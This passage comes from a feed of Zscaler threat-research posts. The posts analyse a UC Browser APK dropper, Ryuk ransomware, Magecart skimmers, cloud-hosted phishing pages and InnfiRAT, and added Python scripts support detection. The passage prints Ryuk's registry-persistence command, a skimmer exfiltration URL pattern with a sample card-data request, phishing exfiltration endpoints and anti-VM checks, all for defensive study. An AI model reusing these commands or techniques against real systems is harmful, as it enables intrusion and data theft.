Fig. 3: UC Browser app icon and initial Android activity

After some initial requests for news and notifications, the app sends multiple requests with redirections and finally drops an APK onto the user's device. The screenshot below illustrates the chain of requests and redirects taking place:

Fig. 4: Unsecured requests for APK download

This functionality of dropping another APK from a third-party source clearly violates Google Play's policy, which includes the following: "An app distributed via Google Play may not modify, replace, or update itself using any method other than Google Play's update mechanism. Likewise, an app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play. This restriction does not apply to code that runs in a virtual machine and has limited access to Android APIs (such as JavaScript in a webview or browser)."

During our analysis, we found the APK being dropped on external storage, but we did not find the APK being installed.
It is possible that this functionality is still under development, or there may be other reasons it wasn't installed, such as an exception, a disabled unknown-sources option, or a rooted device.

2. Communication over an unsecured channel

The APK was downloaded over an unsecured channel (HTTP instead of HTTPS), opening the possibility of man-in-the-middle (MiTM) attacks. In our research, we came across a recent Dr. Web blog post that talks about similar issues they saw with UC Browser downloading and installing libraries from remote servers. In that case, they describe libraries being downloaded over HTTP; in our case, we saw a completely new APK being dropped (this APK is also analyzed in the latter part of this blog).

The consequences of downloading and installing components over unsecured channels were well addressed in the Dr. Web blog, along with the MiTM vulnerability, so we will not address those issues further. We noticed that the app analyzed by Dr. Web researchers had the same icon as our sample, but a different full name and a different developer. The screenshots below show the Dr. Web sample (left) compared to the Zscaler sample (right):

Fig. 5: UC Browser app samples: Dr. Web (left) and Zscaler (right)

It could be that the same app had been uploaded again to Google Play with a different name and developer, along with modified or enhanced code to download additional APKs.

3. Dropping an APK on external storage

We also noticed that the additional APK dropped by this app is stored on external storage, which is world-readable by default. The screenshot below shows the location of the dropped APK:

Fig. 6: Dropped APK storage location

Because the APK is placed on external storage, any other app holding the storage permission (android.permission.READ_EXTERNAL_STORAGE or android.permission.WRITE_EXTERNAL_STORAGE) can access this location and tamper with the downloaded APK.
Analysis of the dropped APK

During our analysis, we noted that UC Browser was dropping the APK but not installing it. It is unclear whether this is because the functionality is still under development or there is another reason the APK is not installed. But we did want to find out what the APK contained, so we decided to install it manually and have a look inside. To our surprise, we found that the APK was actually a third-party app store named "9 Apps" with the package name com.mobile.indiapp.

Fig. 7: 9Apps app install process

After installing the app, it scans the device for installed apps. The app's scanning and further activities can be seen in the screenshots below:

Fig. 8: 9Apps initial activities

We also saw several adult apps available for download in this third-party app store. These apps can be seen in the screenshot below:

Fig. 9: Adult apps on 9Apps store

We tried downloading a small app from the 9Apps store and, to our surprise, the app was downloaded from 9appsdownloading[.]com. This is the same domain that we mentioned at the beginning of this blog. The screenshot below shows the functionality in action:

Fig. 10: Sample APK download requests

Further scrutiny of Zscaler cloud traffic showed multiple requests for APK downloads from this 9appsdownloading[.]com domain. Within the last month, we found 130+ such requests. The hits can be seen in the Zscaler cloud dashboard:

Fig. 11: Zscaler dashboard showing the domain's activity

Conclusion

The tactics used by UC Browser and UC Mini violate Google Play security policies and make it possible for any malicious app to gain entry into a user's device. While 9Apps, an app store for Android apps, is not a malicious site, we searched the domain using VirusTotal, which showed a number of detections:

Fig. 12: VirusTotal search for the domain

It is too early to determine exactly what the UC Browser developers intended with their third-party APK, but it is clear that they are putting users at risk. And with more than 500 million downloads of UC Browser, that is a significant threat. Because UC Browser downloads an unknown third-party app to devices over unsecured channels, those devices can fall victim to man-in-the-middle (MiTM) attacks. Using MiTM, attackers can spy on the device and intercept or change its communications. The UC Browser app's use of unsecured channels also allows attackers to install an arbitrary payload on a device that can perform a variety of activities, such as displaying phishing messages designed to steal personal data, including usernames, passwords, and credit card numbers. Once a user device has been compromised, and that compromised device connects back at the office, attackers have the ability to establish a foothold in the network, so they can snoop, spread malware, or steal data.

Examining the Ryuk Ransomware

Zscaler Research - 1 hour 14 mins ago
Ryuk ransomware had a disturbingly successful debut, being used to hit at least three organizations in its first two months of activity for more than $640,000 in ransom. Several attacks followed, where the attackers demanded even greater amounts of ransom.

The attackers were able to demand and receive high ransoms because of a unique trait in the Ryuk code: the ability to identify and encrypt network drives and resources, as well as delete shadow copies on the endpoint. By carrying out these actions, the attackers could disable the Windows System Restore option, making it impossible for users to recover from the attack without external backups. Unlike other ransomware, Ryuk is distributed by common botnets, such as Trickbot and Emotet, which have been widely used as banking trojans. In this blog, we'll provide an analysis of how the Ryuk ransomware encrypts a victim's data while blocking the infected system from restoring the data.

Analysis

The Ryuk dropper contains both 32-bit and 64-bit payloads. The dropper checks whether it is being executed on a 32-bit or 64-bit OS using the "IsWow64Process" API and drops the payload accordingly. It also checks the version of the operating system. If it is executed on Windows XP, it drops the Ryuk payload at "C:\Documents and Settings\Default User\{random-5 char}.exe". If it is executed on Windows Vista or a later version of Windows, it drops the file at "C:\users\Public\{random-5 char}.exe". Next, it executes the payload using the ShellExecuteW API.

Persistence mechanism

Ryuk adds the following registry key so that it executes at every login. It uses the command below to create the registry key:

"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Public\{random-5 char}.exe" /f

Process injection

Ryuk injects its main code into several remote processes.
Ryuk enumerates processes by calling the CreateToolhelp32Snapshot API and injects its code into every process except those named explorer.exe, lsass.exe and csrss.exe, and those running under NT AUTHORITY accounts. Ryuk ransomware terminates processes and stops services contained on a predefined list. These processes and services are mostly antivirus tools, databases, backups, and other software. The screenshot below shows the list of services stopped by Ryuk.

Figure 1: The list of services disabled by the Ryuk ransomware.

The screenshot below shows the list of processes terminated by Ryuk.

Figure 2: The list of processes terminated by the Ryuk ransomware.

Ryuk also deletes shadow copies and other backup storage files using a .BAT file so that the infected system can't restore data. Below is the list of commands used by Ryuk to perform these deletions.

Figure 3: The list of commands used by Ryuk ransomware to delete shadow copies and other backup storage files.

Encryption and similarity with Hermes ransomware

Ryuk uses a combination of RSA (asymmetric) and AES (symmetric) encryption to encrypt files. Ryuk embeds an RSA key pair in which the RSA private key is already encrypted with a global RSA public key. The sample generates an AES-256 key for each file and encrypts the file with that AES key. The AES key is then encrypted with the embedded public key and appended to the end of the encrypted file. If all samples contained the same RSA key pair, then after getting access to one private key it would be easy to decrypt all of the files. But Ryuk contains a different RSA key pair for every sample. Some samples append the ".RYK" extension and some don't append any extension after encrypting the files.

Ryuk has a feature in common with Hermes ransomware. During encryption, Ryuk adds a marker to the encrypted file using the keyword "HERMES".
Ryuk checks for the HERMES marker before encrypting any file to determine whether it has already been encrypted. The screenshot below displays the HERMES marker and the encrypted AES key appended at the end of the encrypted file.

Figure 4: The HERMES marker and the encrypted AES key.

Ryuk encrypts files on every drive and network share reachable from the infected system. It whitelists a few folders, including "Windows, Mozilla, Chrome, Recycle Bin, and Ahnlab", so it won't encrypt files inside those folders. Ryuk drops its ransom note, named RyukReadMe.txt, in every directory. Ryuk asks for the ransom in bitcoin, providing the bitcoin address in the ransom note. Ryuk contains different templates for the ransom note. Below is a screenshot of the RyukReadMe.txt file.

Figure 5: Ryuk ransomware ransom note.

After completing the encryption, Ryuk creates two files. One is "Public" and contains an RSA public key, while the second is "UNIQUE_ID_DO_NOT_REMOVE" and contains a unique hardcoded key.

Conclusion

While most ransomware is spread using spam email and exploit kits, Ryuk is delivered as a payload of the Emotet and Trickbot malware. Looking at the encryption process and ransom demands, Ryuk is targeting big enterprises in the hopes of large payoffs. The Zscaler ThreatLabZ team continues to monitor this threat to ensure that Zscaler customers are protected.

IOCs

MD5:
5AC0F050F93F86E69026FAEA1FBB4450
6CDCB9F86972EFC4CFCE4B06B6BE053A
31BD0F224E7E74EEE2847F43AAE23974

Rajdeepsinh Dodia and Amandeep Kumar are security researchers on the Zscaler ThreatLabZ team.
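The same file-level artifacts Ryuk uses to avoid double-encrypting (the HERMES trailer) and to communicate with the victim (RyukReadMe.txt, Public, UNIQUE_ID_DO_NOT_REMOVE) are what an incident responder can scope an infection by. The script below is an added example, not Zscaler's code: it walks a tree and buckets files by those indicators, building a constructed sample tree in a temp directory so it runs offline. The post does not give the byte layout of the trailer, so the scan assumes only that the marker appears somewhere in the last kilobyte of an encrypted file; that window is an assumption to tune against real samples.

```python
"""Triage a file tree for the Ryuk artifacts described above.

Added example, not Zscaler's code. It relies only on what the post states: a
"HERMES" marker and the encrypted AES key are appended to each encrypted file,
some samples add a ".RYK" extension, RyukReadMe.txt is dropped in every
directory, and "Public" / "UNIQUE_ID_DO_NOT_REMOVE" are written afterwards.
The post does not give the trailer layout, so the scan looks for the marker
anywhere in the last TAIL_BYTES of a file (an assumption). The sample tree is
constructed here; no real sample is needed or used.
"""
import os
import tempfile

MARKER = b"HERMES"
TAIL_BYTES = 1024
NOTE_NAME = "RyukReadMe.txt"
KEY_FILES = {"Public", "UNIQUE_ID_DO_NOT_REMOVE"}


def has_hermes_trailer(path):
    """True if the HERMES marker appears in the file's final TAIL_BYTES."""
    with open(path, "rb") as f:
        f.seek(0, os.SEEK_END)
        size = f.tell()
        f.seek(max(0, size - TAIL_BYTES))
        return MARKER in f.read()


def triage(root):
    """Walk root and bucket files by the Ryuk indicators they show."""
    report = {"scanned": 0, "encrypted": [], "ryk_ext": [], "notes": [], "key_files": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            report["scanned"] += 1
            if name == NOTE_NAME:
                report["notes"].append(rel)
                continue
            if name in KEY_FILES:
                report["key_files"].append(rel)
                continue
            if name.lower().endswith(".ryk"):
                report["ryk_ext"].append(rel)
            if has_hermes_trailer(path):
                report["encrypted"].append(rel)
    for key in ("encrypted", "ryk_ext", "notes", "key_files"):
        report[key].sort()
    return report


def _write(path, data):
    with open(path, "wb") as f:
        f.write(data)


def make_sample_tree():
    """Build a constructed post-infection tree in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="ryuk-triage-")
    docs = os.path.join(root, "docs")
    os.makedirs(docs)
    # Stand-in for "ciphertext + HERMES marker + encrypted AES key" (constructed).
    trailer = MARKER + b"\x00" * 32
    _write(os.path.join(docs, "report.xlsx.RYK"), b"ciphertext" * 10 + trailer)
    _write(os.path.join(docs, "photo.jpg"), b"ciphertext" * 10 + trailer)   # no extension added
    _write(os.path.join(docs, "untouched.txt"), b"plain text, no marker")
    _write(os.path.join(docs, NOTE_NAME), b"ransom note")
    _write(os.path.join(root, NOTE_NAME), b"ransom note")
    _write(os.path.join(root, "Public"), b"-----BEGIN PUBLIC KEY-----")
    _write(os.path.join(root, "UNIQUE_ID_DO_NOT_REMOVE"), b"id")
    return root


if __name__ == "__main__":
    for key, value in triage(make_sample_tree()).items():
        print(key, value)
```

Counting on the trailer rather than the extension matters because, as the post notes, some samples add no extension at all: in the sample tree photo.jpg is reported as encrypted even though only report.xlsx.RYK carries the suffix. Point `triage()` at a mounted image or a share root to scope which directories were reached.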

Magecart hits again, leveraging compromised sites and newly registered domains

Zscaler Research - 1 hour 14 mins ago
During alert monitoring, ThreatLabZ researchers came across multiple cases of shopping sites being compromised and injected with a skimming script. The injected script looks for the payment method and personally identifiable information (PII) and captures the supplied financial information, which is then sent to an adversary-controlled gate server even before the user hits the submit button. There have been multiple reports published related to Magecart activity, and ThreatLabZ has blogged about the group's activities in the past (see our previous blogs from September 2018 and July 2019). In this blog, we provide an overview of the current skimming campaigns, with an analysis of those that use compromised sites to host the skimmer code and those that use newly registered domains.

The following screen capture shows the Magecart hits we observed over the last 90 days. The activity appears to be fairly consistent week to week, with a spike at the end of the analysis period, and we believe it is likely to continue.

Figure 1: Hits on compromised sites over 90 days (x-axis=date, y-axis=hits)

Most of the impacted websites are in the shopping category. The following graph shows the cloud-wide statistic for the number of unique domains per category for the sites impacted.

Figure 2: URL categories of impacted sites (x-axis=URL category, y-axis=unique domain counts)

This Magecart-based skimming campaign did not reveal any novel tactics, tools, or procedures, but it seems to be more structured in terms of the scripts being used across multiple compromises, similar gate URL parameter patterns, and the algorithm used for data encoding. The cycles we observed were generally the same, but we did see some differences. Some use obfuscation to hide the script injection code and use another compromised site for hosting the skimmer script, while others make use of newly registered domains for skimmer script hosting. Regardless of the loading script, the skimmer code itself has little to no obfuscation.

Cycle 1: Compromised site loads skimmer code from another compromised site

The following image shows a Fiddler session that demonstrates the skimming chain.

Figure 3: Fiddler session for Magecart skimming

In these skimming campaigns, we can see compromised sites sending captured payment information to domains that are either newly registered or compromised and under the control of an adversary. In the following example, the gate site is a compromised site as well; it was registered on 2013-03-19.

Figure 4: Example of injected script and skimmer code

The skimmer code waits for the user to fill in the personal information and payment method and captures it all before the user hits the submit button. The captured information is then encoded with Base64 and sent to the gate URL in a GET request.

Figure 5: Skimmer script sending Base64-encoded PII and payment information in a GET request

Cycle 2: Compromised site loads skimmer code from a newly registered domain

As shown in the image below, the skimming script is hosted on a domain registered just 10 days before this analysis.

Figure 6: Compromised site leveraging skimmer script from a newly registered domain

All the skimmer scripts we have identified so far are similar, and we observed the following common gate URL pattern:

hxxps://domain/{path}.(php|js)?hash=[base64data]

Figure 7: Skimmer script differences

We saw multiple cases where the same skimmer code locations were used in multiple compromised sites, including:

custommagnetsdirect[dot]com/catalog/view/javascript/jquery/jquery.sticky.js
matteola[dot]com/js/varien/js.js

The image below shows examples of skimmer code locations being used for multiple compromised sites.

Figure 8: The same skimmer code locations used in multiple compromised sites

Conclusion

Magecart has been successful for years because attackers have improved their techniques for injecting malicious code and hiding it from detection. Now we are seeing attackers steal payment card information before it is even submitted. Zscaler ThreatLabZ actively tracks such campaigns and protects customers from skimming and other types of data-stealing attacks.

Appendix

Common skimmer JS URL patterns
/5d1cbc8c073d4.js
/baypressservices/baypr.js
/check_cvv2_number_script.js
/datetimepicker/bootstrap-datetimepicker.min.js
/images/js/googleapi.js
/javascript/checkcheckout.js
/5d4cdc4cdf344.js
/js/afterpay/checkout/idev_onestep.js
/js/check_analystic.js
/js/extjs/fix-defer-after.js
/js/footer-link.js
/js/front-scripts.min.js
/js/lib/ccard.js
/js/mage/cookies.js
/js/mage/google.js
/js/prototype/prototype.js
/js/scriptaculous/print.js
/varien/email.js
/varien/js.js
/varien/mail.js
/my/vmart.js
/qcore.js
/rimzoneonline/code.js
/silver/acor.js
/wp-includes/js/jquery/jquery.js

Bad domains (with creation date)
api-googles[dot]com                2019-03-30T18:40:29Z
cloudflara[dot]org                 2019-07-10T19:16:22Z
developer-js[dot]info              2019-03-07T21:29:25Z
facebookfollow[dot]com             2019-07-21T02:29:39Z
googletagmanager-service[dot]com   2019-02-09T23:28:49Z
gooqleadvstat[dot]com              2019-09-13T11:22:10Z
jquery-cdn[dot]top                 2018-09-28T07:41:02Z
jquery-js[dot]com                  2017-01-02T11:21:35Z
jquery[dot]su                      2019-02-27T19:12:36Z
jquerycodemagento[dot]com          2019-08-11T13:05:43Z
magento-security[dot]org           2017-11-14T16:32:41Z
magento-track[dot]com              2018-12-28T20:44:11Z
script-analytics[dot]com           2019-08-13T22:16:38Z
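The gate URL pattern and the appendix indicators above translate directly into a proxy-log hunt. The script below is an added example (not code from the Zscaler post): it matches outbound requests against the reported pattern `{path}.(php|js)?hash=[base64data]`, decodes the hash parameter, and checks whether the decoded payload carries a Luhn-valid 13-19 digit run, which is what a skimmed card number looks like once decoded. The domain and path sets are taken from the appendix (with [dot] restored); the log line format, the sample lines and the 4111 1111 1111 1111 test card number are constructed for the demo.

```python
"""Proxy-log hunt for Magecart gate requests (added example, not from the post).

Assumptions: log lines are '<timestamp> <client> GET <url>' (constructed
format); indicator lists are a subset of the post's appendix.
"""
import base64
import re
from urllib.parse import urlsplit, parse_qs

# Subset of the "Bad domains" table from the post's appendix.
BAD_DOMAINS = {
    "api-googles.com", "cloudflara.org", "developer-js.info", "facebookfollow.com",
    "googletagmanager-service.com", "gooqleadvstat.com", "jquery-cdn.top",
    "jquery-js.com", "jquery.su", "jquerycodemagento.com", "magento-security.org",
    "magento-track.com", "script-analytics.com",
}
# Subset of the "Common skimmer JS URL patterns" list from the appendix.
SKIMMER_PATHS = {
    "/js/mage/google.js", "/js/lib/ccard.js", "/check_cvv2_number_script.js",
    "/varien/js.js", "/js/check_analystic.js",
}
GATE_PATH_RE = re.compile(r"^/.+\.(?:php|js)$")


def luhn_ok(digits: str) -> bool:
    """Standard Luhn checksum over an ASCII digit string."""
    total, double = 0, False
    for ch in reversed(digits):
        n = int(ch)
        if double:
            n = n * 2 - 9 if n * 2 > 9 else n * 2
        total += n
        double = not double
    return total % 10 == 0


def decode_hash_param(value: str):
    """Base64-decode the hash parameter, tolerating stripped padding and '+' mangled by parse_qs."""
    value = value.replace(" ", "+")          # parse_qs turns '+' into a space
    padded = value + "=" * (-len(value) % 4)
    for decoder in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            return decoder(padded).decode("utf-8", "replace")
        except ValueError:
            continue
    return None


def card_like_numbers(text: str) -> list:
    """Luhn-valid digit runs of card-number length inside the decoded payload."""
    return [m for m in re.findall(r"(?<!\d)\d{13,19}(?!\d)", text) if luhn_ok(m)]


def analyse_url(url: str) -> dict:
    """Score one outbound URL against the gate pattern and the published indicators."""
    parts = urlsplit(url)
    hash_vals = parse_qs(parts.query).get("hash", [])
    decoded = decode_hash_param(hash_vals[0]) if hash_vals else None
    reasons = []
    if parts.hostname in BAD_DOMAINS:
        reasons.append("known bad domain")
    if parts.path in SKIMMER_PATHS:
        reasons.append("known skimmer script path")
    if GATE_PATH_RE.match(parts.path) and hash_vals:
        reasons.append("gate URL pattern (.php/.js?hash=)")
    if decoded and card_like_numbers(decoded):
        reasons.append("decoded hash carries Luhn-valid card-like number")
    return {"url": url, "reasons": reasons, "decoded": decoded}


def hunt(log_lines: list) -> list:
    """Return the analysis of every log line that triggered at least one reason."""
    flagged = []
    for line in log_lines:
        fields = line.split(" ", 3)
        if len(fields) < 4:
            continue
        result = analyse_url(fields[3])
        if result["reasons"]:
            flagged.append(result)
    return flagged


# Constructed sample traffic: one benign asset, one gate request, one known skimmer path.
SAMPLE_PAYLOAD = base64.b64encode(b"name=Jane+Doe&cc=4111111111111111&exp=12/24&cvv=123").decode()
SAMPLE_LOG = [
    "2019-11-27T10:00:01Z 10.0.0.5 GET https://shop.example/catalog/view/theme/default/style.css",
    "2019-11-27T10:00:09Z 10.0.0.5 GET https://jquery-js.com/stat/counter.php?hash=" + SAMPLE_PAYLOAD,
    "2019-11-27T10:00:10Z 10.0.0.7 GET https://cdn.example/js/lib/ccard.js",
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit["url"], "->", hit["reasons"])
```

The Luhn check is what makes this more than an indicator match: the published gate domains rotate, but a GET request whose base64 query parameter decodes to a valid card number from a checkout page is suspicious on any domain, so that rule keeps working after the domain list goes stale.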

Phishing attacks abusing appspot.com and web.app domains on Google Cloud

Zscaler Research - 1 hour 14 mins ago
In July, Zscaler ThreatLabZ posted a blog about a rise in the use of Microsoft Azure domains to host phishing attacks. Our researchers recently detected similar activity on the Google domains Appspot.com and Web.app. Appspot.com is a cloud computing platform for developing and hosting web applications in Google-managed data centers. Web.app is a mobile platform used for building mobile apps hosted by Firebase, which is Google's mobile app platform.

These campaigns use SSL certificates issued by Appspot.com and Web.app, and they have well-designed login pages that attempt to spoof popular brands widely used in business, such as Dropbox Business, Microsoft Outlook and SharePoint, and DocuSign. They are designed to capture login credentials, which are sent to a remote server. In the analysis that follows, we describe the techniques these campaigns use to avoid detection, and we show the phishing domains and the locations where the user credentials are being sent. As of this date, many of these subdomains on appspot.com and web.app are not being flagged by VirusTotal.

Fig 1: VirusTotal detections for the subdomains

Web.app hosted phishing pages

The following screenshots show phishing pages from some of the sites that use an SSL certificate issued by Web.app.

Fig 2: Microsoft login phishing page
Fig 3: SSL certificate page of the hosted phishing URL

Appspot.com hosted phishing pages

Fig 4: Google Drive login phishing page
Fig 5: Outlook login phishing page
Fig 6: Dropbox login phishing page
Fig 7: DocuSign login phishing page
Fig 8: OneDrive login phishing page
Fig 9: OneDrive login phishing page
Fig 10: OneDrive login phishing page

Evasion techniques

This is a sophisticated phishing campaign, as demonstrated by the well-designed phishing pages that are difficult to distinguish from legitimate pages. In addition, the attackers use the latest tactics to evade detection by scan engines, with most of the code written in an external JavaScript file. This filename is 32 characters long and different for every site. Below is the source code of the phishing pages; the highlighted part is the external JavaScript mentioned above.

Fig 11: Source code of phishing page
Fig 12: Source code of phishing page

In the landing page source code of the phishing URL shown above, there is little content, no brand name, and none of the catchy strings that are common in most phishing campaigns. This enables it to bypass many automatic analysis engines and extend its survival. The following screenshots show the code and the location where the user credentials are sent. This code is present in the randomly named, externally loaded JavaScript files.

Fig 13: Location used by the attacker to collect user credentials
Fig 14: Location used by the attacker to collect user credentials

The following figure shows a sample packet capture of this data being sent to the attacker's site.

Fig 15: Packet capture for the data sent to the attacker's site

Zscaler is actively blocking these phishing pages. The following screen capture shows Zscaler detection for one of these pages:

Fig 16: Zscaler successfully detects these domains

Phishing domains

As of the writing of this blog, we have collected the following phishing domains.

uy67dass[.]appspot[.]com
ja8fspxzosaa[.]appspot[.]com
gjf9pxzosa[.]appspot[.]com
egoew023pzas[.]appspot[.]com
vhkad03pas[.]appspot[.]com
kda8gazxa[.]appspot[.]com
adgkao93pz[.]appspot[.]com
l9rwpodsxcs[.]appspot[.]com
cvgfsaz[.]appspot[.]com
jga9spzas[.]appspot[.]com
jjad9gdpxzsa[.]appspot[.]com
vadgka932oa[.]appspot[.]com
ls9ixosdsasa[.]appspot[.]com
qwsa92oozxa[.]appspot[.]com
adlg402ooz[.]appspot[.]com
bnb932psiz[.]appspot[.]com
authofisaiz[.]web[.]app
Telecomm-uk[.]web[.]app
f45ghdsas[.]appspot[.]com
Derr9qepzxas[.]appspot[.]com
Vgdikad9oqww[.]appspot[.]com
dsa3aszxsa[.]appspot[.]com
weotwe0dpa[.]appspot[.]com
Wy6fxsa[.]appspot[.]com
Yu56sdzsa[.]appspot[.]com
Vbhg45as[.]appspot[.]com
Hds9pzoas[.]appspot[.]com
khs9dpas[.]appspot[.]com
u76dfsdasa[.]appspot[.]com
y56fds[.]appspot[.]com
vfhgj3sz[.]appspot[.]com
eyq246ddpoas[.]appspot[.]com
h45dsagga[.]appspot[.]com
sds43dza[.]appspot[.]com
yt76uyhxzz[.]appspot[.]com
jh54dfaz[.]appspot[.]com
ytyfazxz[.]appspot[.]com

Where information is sent

Below are the locations to which the phishing pages send the credentials entered by the user.

https://osipz[.]c3y5-tools[.]com/1[.]newsvpost_ads_auto/loading[.]php
https://osipz[.]kute[.]pw/1[.]newsvpost_ads/loading[.]php
https://xotpe[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
https://uiufz[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
https://xotpe[.]kute[.]pw/1[.]newsvpost_ads/loading[.]php
https://xotpe[.]bugcart[.]com/1[.]newsvpost_ads/loading[.]php
https://xotpe[.]dtvd[.]biz/1[.]newsvpost_ads/loading[.]php
https://uy6x[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
https://h76fg[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
https://hjif[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
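The evasion pattern described above (a near-empty landing page on a *.appspot.com or *.web.app subdomain that pulls one externally hosted, randomly named 32-character JavaScript file) can be turned into a triage heuristic for URL analysis pipelines. The script below is an added example, not code from the Zscaler post: it parses a page with the standard library HTML parser, measures visible text, looks for brand strings and password fields, and flags a script whose file name is exactly 32 alphanumeric characters. The two HTML documents, the brand word list, the 200-character text threshold and the treatment of the filename as alphanumeric are constructed assumptions for the demo; the suspect hostname is one of the subdomains listed in the post.

```python
"""Landing-page triage for the appspot.com / web.app phishing pattern (added example).

Assumptions: a 32-character random script name is alphanumeric; a landing page
with under 200 characters of visible text and no brand string is "near-empty";
sample HTML below is constructed, not captured from a real phishing page.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

CLOUD_HOST_RE = re.compile(r"\.(appspot\.com|web\.app)$", re.I)
RANDOM_JS_RE = re.compile(r"^[A-Za-z0-9]{32}\.js$")
BRAND_WORDS = ("microsoft", "outlook", "onedrive", "sharepoint", "dropbox", "docusign", "google")
MIN_VISIBLE_TEXT = 200


class PageStats(HTMLParser):
    """Collect external script sources, visible text length and password inputs."""

    def __init__(self):
        super().__init__()
        self.scripts, self.text_chars, self.password_fields = [], 0, 0
        self._skip = 0  # depth inside <script>/<style>, whose text is not visible

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.scripts.append(a["src"])
        if tag in ("script", "style"):
            self._skip += 1
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text_chars += len(data.strip())


def triage_page(url: str, html: str) -> dict:
    """Return the findings for one landing page; score is the number of findings."""
    stats = PageStats()
    stats.feed(html)
    host = urlsplit(url).hostname or ""
    lowered = html.lower()
    random_scripts = [s for s in stats.scripts if RANDOM_JS_RE.match(s.rsplit("/", 1)[-1])]
    findings = []
    if CLOUD_HOST_RE.search(host):
        findings.append("hosted on appspot.com/web.app subdomain")
    if random_scripts:
        findings.append("external script with 32-char random name")
    if stats.text_chars < MIN_VISIBLE_TEXT and not any(b in lowered for b in BRAND_WORDS):
        findings.append("near-empty page without brand strings")
    if stats.password_fields:
        findings.append("password field present")
    return {"host": host, "findings": findings, "random_scripts": random_scripts, "score": len(findings)}


# Constructed samples: a minimal loader page like the one the post describes, and a normal login page.
SUSPECT_URL = "https://uy67dass.appspot.com/"
SUSPECT_HTML = """<!DOCTYPE html><html><head><meta charset="utf-8"><title>Sign in</title>
<script src="./a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6.js"></script></head>
<body><div id="app"></div></body></html>"""
BENIGN_URL = "https://www.example.com/login"
BENIGN_HTML = ("""<html><head><title>Example Corp Sign in</title>
<script src="/static/js/app.min.js"></script></head><body>
<h1>Welcome to Example Corp</h1><p>""" + "Please sign in with your company account. " * 10
               + """</p><form><input type="text" name="u"><input type="password" name="p"></form>
</body></html>""")

if __name__ == "__main__":
    for url, html in ((SUSPECT_URL, SUSPECT_HTML), (BENIGN_URL, BENIGN_HTML)):
        print(url, triage_page(url, html))
```

Note what the suspect page does not trigger: it has no password field in its static HTML, because the form is built by the external script at render time. That is exactly why static scanners that key on brand names or form fields miss these pages, and why the empty-page-plus-random-script combination is the more durable signal.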

InnfiRAT: A new RAT aiming for your cryptocurrency and more

Zscaler Research - 1 hour 14 mins ago
Recently, the Zscaler ThreatLabZ team came across a new RAT called InnfiRAT, which is written in .NET and designed to perform specific tasks on an infected machine. This blog provides an analysis of this new RAT, including the way it communicates, the tasks it performs, and the information it steals.

Background

As with just about every piece of malware, InnfiRAT is designed to access and steal personal information on a user's computer. Among other things, InnfiRAT looks for cryptocurrency wallet information, such as Bitcoin and Litecoin wallets. InnfiRAT also grabs browser cookies to steal stored usernames and passwords, as well as session data. In addition, this RAT has screenshot functionality so it can grab information from open windows; for example, if the user is reading email, the malware takes a screenshot. It also checks for other applications running on the system, such as an active antivirus program.

InnfiRAT sends the data it has collected to its command-and-control (C&C) server and requests further instructions. The C&C can also instruct the malware to download additional payloads onto the infected system.

Technical analysis

1) Before executing the main payload, the malware checks whether it is executing from the %AppData% directory under the name NvidiaDriver.exe. If not, a web request is sent to "iplogger[.]com/1HEt47" (possibly to check network connectivity).

2) It records all the running processes in an array, then iterates through each process and checks whether any process is running with the name NvidiaDriver.exe. If so, the malware kills that process and waits for it to exit.

Figure 1: Checks execution location, terminates process with name NvidiaDriver

3) InnfiRAT copies itself to %AppData%/NvidiaDriver.exe and executes that copy from %AppData% before terminating the current process.

Figure 2: The malware makes a copy of itself in %AppData%

4) After confirming the path of file execution, it writes a Base64-encoded PE file in memory, which is later decoded into its actual format and loaded after changing the entry point of the file. This is also a .NET executable and contains the actual functionality of the malware.

Figure 3: Embedded PE file in encoded form

Figure 4: Embedded PE file is decoded and executed

Analysis of embedded .NET executable

All the strings inside the file are encoded with a custom encoding scheme that uses the XOR operation.

Figure 5: Strings decoding logic

As execution starts, the malware checks for the presence of a VM environment. It does so by checking the return value of the routine JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337. If the return value equals the first value, enum[0], defined in the enum shown below, it continues execution; otherwise it terminates.

Figure 6: User-defined enum structure

After performing the VM checks, the malware obtains the country and HWID of the machine it is running on. To obtain the country, it calls the routine EjarVhXфf8752612307563884480() [FetchNetworkInfo] and reads the Country key from the returned JSON data. Similarly, to obtain the HWID, it calls the routine ubобмдGogBлzWKrgrыaZucвлC33208440168().

Anti-VM checks

Inside the JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337() [VMDetection] routine:

Note: All the enum values are referenced as enum[index] during analysis, where the index starts from 0.

1. It performs a WMI query to obtain the following information: "Manufacturer", "Caption", "Name", "ProcessorId", "NumberOfCores", "NumberOfLogicalProcessors", "L2CacheSize", "L3CacheSize", "SocketDesignation". It then checks, one by one, whether the manufacturer contains one of the strings below and returns the corresponding enum value:
"VBoxVBoxVBox"            returns enum[2]
"VMwareVMware"            returns enum[1]
"Prl hyperv"              returns enum[3]
"Microsoft Corporation"   returns enum[4]

2. A WMI query is performed again, this time to obtain the following information: "DeviceID", "MediaType", "Model", "PNPDeviceID", "SerialNumber". It checks whether the PnpDeviceId contains one of the strings below and returns the corresponding enum value:
"VBOX_HARDDISK"           returns enum[2]
"VEN_VMWARE"              returns enum[1]

If none of the above conditions match, it returns enum[0].

Machine network information

